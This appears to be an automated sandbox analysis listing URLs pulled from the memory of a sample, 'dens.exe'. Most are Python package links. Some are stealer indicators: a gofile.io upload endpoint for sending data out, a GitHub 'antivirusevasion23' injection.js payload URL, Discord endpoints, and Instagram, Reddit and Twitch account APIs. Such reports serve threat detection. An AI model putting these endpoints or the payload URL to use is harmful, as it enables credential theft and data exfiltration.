            Source: dens.exe, 00000001.00000003.2052987876.000002D9AB1F2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2065625241.000002D9AC640000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2060619384.000002D9AB1F6000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2045707437.000002D9AB1EF000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039709379.000002D9AB1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/pull/28073
            Source: dens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata
            Source: dens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/actions/workflows/main.yml/badge.svg
            Source: dens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/actions?query=workflow%3A%22tests%22
            Source: dens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/issues
            Source: dens.exe, 00000001.00000002.2062222294.000002D9AB5A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/wiki/Development-Methodology
            Source: dens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_resources
            Source: dens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_resources/actions/workflows/main.yml/badge.svg
            Source: dens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_resources/actions?query=workflow%3A%22tests%22
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/hynek
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/hynek).
            Source: dens.exe, 00000001.00000003.1694605237.000002D9AA95C000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1694358511.000002D9AA95C000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040028581.000002D9A8F05000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2038808296.000002D9A8EE8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039627706.000002D9A8EF4000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2057589696.000002D9AA930000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2057253439.000002D9A8F06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
            Source: dens.exe, 00000001.00000003.2029829320.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2052097478.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2060887548.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2047760361.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040630139.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.miH
            Source: powershell.exe, 00000052.00000002.1892866312.00000217AE1D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: dens.exe, 00000001.00000002.2065625241.000002D9AC704000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gofile.io/d/9x70nq
            Source: dens.exe, 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gofile.io/d/9x70nq)
            Source: dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gql.twitch.tv/gql
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hynek.me/articles/import-attrs/)
            Source: dens.exe, 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.hizliresim.com/qxnzimj.jpg
            Source: dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://i.hizliresim.com/qxnzimj.jpgp
            Source: dens.exe, 00000001.00000002.2066236732.000002D9AC930000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.instagram.com/api/v1/accounts/current_user/?edit=true
            Source: dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.instagram.com/api/v1/users/
            Source: dens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD6B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr, METADATA15.0.dr, METADATA.0.drString found in binary or memory: https://img.shields.io/badge/skeleton-2024-informational
            Source: dens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD6B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr, METADATA15.0.dr, METADATA.0.drString found in binary or memory: https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/charliermarsh/ruff/main/assets
            Source: dens.exe, 00000000.00000003.1677230307.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD6B000.00000004.00000020.00020000.00000000.sdmp, METADATA15.0.drString found in binary or memory: https://img.shields.io/pypi/pyversions/backports.tarfile.svg
            Source: dens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/pyversions/importlib_metadata.svg
            Source: dens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/pyversions/importlib_resources.svg
            Source: dens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/pyversions/inflect.svg
            Source: METADATA.0.drString found in binary or memory: https://img.shields.io/pypi/pyversions/jaraco.context.svg
            Source: METADATA0.0.drString found in binary or memory: https://img.shields.io/pypi/pyversions/jaraco.functools.svg
            Source: dens.exe, 00000000.00000003.1677230307.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD6B000.00000004.00000020.00020000.00000000.sdmp, METADATA15.0.drString found in binary or memory: https://img.shields.io/pypi/v/backports.tarfile.svg
            Source: dens.exe, 00000000.00000003.1667512860.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/cryptography.svg
            Source: dens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/importlib_metadata.svg
            Source: dens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/importlib_resources.svg
            Source: dens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/inflect.svg
            Source: METADATA.0.drString found in binary or memory: https://img.shields.io/pypi/v/jaraco.context.svg
            Source: METADATA0.0.drString found in binary or memory: https://img.shields.io/pypi/v/jaraco.functools.svg
            Source: dens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importlib-metadata.readthedocs.io/
            Source: dens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importlib-metadata.readthedocs.io/en/latest/?badge=latest
            Source: dens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importlib-resources.readthedocs.io/
            Source: dens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/?badge=latest
            Source: dens.exe, 00000001.00000002.2060177775.000002D9AB080000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
            Source: dens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://inflect.readthedocs.io/en/latest/?badge=latest
            Source: dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://instagram.com/
            Source: dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://instagram.com/0A
            Source: METADATA.0.drString found in binary or memory: https://jaracocontext.readthedocs.io/en/latest/?badge=latest
            Source: METADATA0.0.drString found in binary or memory: https://jaracofunctools.readthedocs.io/en/latest/?badge=latest
            Source: dens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jaracotext.readthedocs.io/en/latest/#jaraco.text.WordSet
            Source: dens.exe, 00000001.00000003.2033820717.000002D9AB24E000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039766959.000002D9AA9C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klaviyo.com/
            Source: dens.exe, 00000001.00000003.2048626589.000002D9AA9FD000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1702755471.000002D9AB2F0000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2041163716.000002D9AA9CE000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2046859632.000002D9AA9FC000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039766959.000002D9AA9C5000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2049325458.000002D9AA9FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
            Source: dens.exe, 00000000.00000003.1667512860.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.python.org/mailman/listinfo/cryptography-dev
            Source: dens.exe, 00000001.00000003.2028056493.000002D9AD0C3000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2028962685.000002D9ACB74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://media.discordapp.net/attachments/1192191430827970571/1196865524919975976/68747470733a2f2f636
            Source: powershell.exe, 00000052.00000002.1907212473.00000217BD754000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000052.00000002.1907212473.00000217BD611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000052.00000002.1892866312.00000217AEF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oauth.reddit.com/api/v1/me
            Source: svchost.exe, 00000034.00000003.1792575862.000001DE906C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
            Source: svchost.exe, 00000034.00000003.1792575862.000001DE90656000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
            Source: powershell.exe, 00000052.00000002.1892866312.00000217AECF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
            Source: powershell.exe, 00000052.00000002.1892866312.00000217AECF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
            Source: dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://open.spotify.com/user/
            Source: dens.exe, 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://open.spotify.com/user/pO
            Source: dens.exe, 00000001.00000002.2062811455.000002D9AB9E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/guides/packaging-namespace-packages/.
            Source: dens.exe, 00000001.00000002.2062811455.000002D9AB9E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/
            Source: dens.exe, 00000001.00000002.2062436664.000002D9AB7B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/
            Source: dens.exe, 00000001.00000002.2062436664.000002D9AB7B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/02
            Source: dens.exe, 00000001.00000003.2042664984.000002D9AADB8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2047151959.000002D9AADC1000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2044627162.000002D9AADB8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039084149.000002D9AADB8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2050122173.000002D9AADC2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040864660.000002D9AADB8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2059354270.000002D9AADC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/pyproject-toml/#declaring-project-metadata-the
            Source: dens.exe, 00000001.00000003.1702664706.000002D9AB3DD000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2062625021.000002D9AB8C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
            Source: METADATA.0.drString found in binary or memory: https://path.readthedocs.io/en/latest/api.html
            Source: dens.exe, 00000001.00000002.2059942735.000002D9AAE70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0649/)
            Source: dens.exe, 00000001.00000002.2062811455.000002D9AB9E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0685/
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0749/)-implementing
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/attrs/)
            Source: dens.exe, 00000000.00000003.1677230307.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD6B000.00000004.00000020.00020000.00000000.sdmp, METADATA15.0.drString found in binary or memory: https://pypi.org/project/backports.tarfile
            Source: dens.exe, 00000001.00000002.2062436664.000002D9AB7B0000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1703422725.000002D9AB24E000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1703029573.000002D9AB206000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1703084861.000002D9AB3D5000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2062811455.000002D9AB9E0000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2062625021.000002D9AB8C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/build/).
            Source: dens.exe, 00000000.00000003.1667512860.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/cryptography/
            Source: dens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/importlib_metadata
            Source: dens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/importlib_resources
            Source: dens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/inflect
            Source: METADATA.0.drString found in binary or memory: https://pypi.org/project/jaraco.context
            Source: METADATA0.0.drString found in binary or memory: https://pypi.org/project/jaraco.functools
            Source: METADATA14.0.drString found in binary or memory: https://pypi.org/project/setuptools/
            Source: dens.exe, 00000000.00000003.1684040951.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1685131998.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/word2number/
            Source: dens.exe, 00000001.00000003.2028056493.000002D9AD0C3000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2028962685.000002D9ACB74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com//antivirusevasion23/main/injection/injection.js
            Source: dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/antivirusevasion23/injection/main/injection.js
            Source: dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/antivirusevasion23/injection/main/injection.js0
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/python-attrs/attrs/main/docs/_static/attrs_logo.svg
            Source: dens.exe, 00000000.00000003.1677230307.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD6B000.00000004.00000020.00020000.00000000.sdmp, METADATA15.0.drString found in binary or memory: https://readthedocs.org/projects/backportstarfile/badge/?version=latest
            Source: dens.exe, 00000000.00000003.1667512860.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
            Source: dens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/importlib-metadata/badge/?version=latest
            Source: dens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/importlib-resources/badge/?version=latest
            Source: dens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/inflect/badge/?version=latest
            Source: METADATA.0.drString found in binary or memory: https://readthedocs.org/projects/jaracocontext/badge/?version=latest
            Source: METADATA0.0.drString found in binary or memory: https://readthedocs.org/projects/jaracofunctools/badge/?version=latest
            Source: dens.exe, 00000001.00000003.1701168036.000002D9AB275000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2062310780.000002D9AB6B0000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1701312245.000002D9AB275000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1702755471.000002D9AB26D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://refspecs.linuxfoundation.org/elf/gabi4
            Source: dens.exe, 00000001.00000003.1703422725.000002D9AB24E000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1703029573.000002D9AB206000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1702664706.000002D9AB3DD000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2062811455.000002D9AB9E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/
            Source: dens.exe, 00000001.00000002.2062811455.000002D9AB9E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/P
            Source: dens.exe, 00000001.00000003.2051391013.000002D9AAD2D000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2041342997.000002D9AACF1000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2046110213.000002D9AAD26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
            Source: dens.exe, 00000001.00000002.2062811455.000002D9AB9E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages
            Source: dens.exe, 00000001.00000002.2062811455.000002D9AB9E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages0
            Source: dens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.readthedocs.io/en/latest/pkg_resources.html
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/questions/tagged/python-attrs)
            Source: dens.exe, 00000001.00000003.2028056493.000002D9AD0C3000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2028962685.000002D9ACB74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://status.discord.com/api/v
            Source: dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://store1.gofile.io/uploadFile
            Source: dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://store1.gofile.io/uploadFilex
            Source: dens.exe, 00000001.00000003.1778402641.000002D9ACFEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: dens.exe, 00000001.00000002.2065840067.000002D9AC830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
            Source: dens.exe, 00000001.00000003.1778402641.000002D9ACFEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
            Source: dens.exe, 00000001.00000003.2040509378.000002D9ABFA0000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2037156381.000002D9ACD94000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2065625241.000002D9AC640000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2050520416.000002D9ACD94000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2064311089.000002D9ABFC2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040589307.000002D9ACD94000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1778896908.000002D9AC3BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: dens.exe, 00000001.00000003.1778896908.000002D9AC39C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: dens.exe, 00000001.00000002.2066912837.000002D9ACD51000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040509378.000002D9ABFA0000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2037156381.000002D9ACD94000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2065625241.000002D9AC640000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2050520416.000002D9ACD94000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2064311089.000002D9ABFC2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040589307.000002D9ACD94000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1778896908.000002D9AC3BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: dens.exe, 00000001.00000003.1778896908.000002D9AC39C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
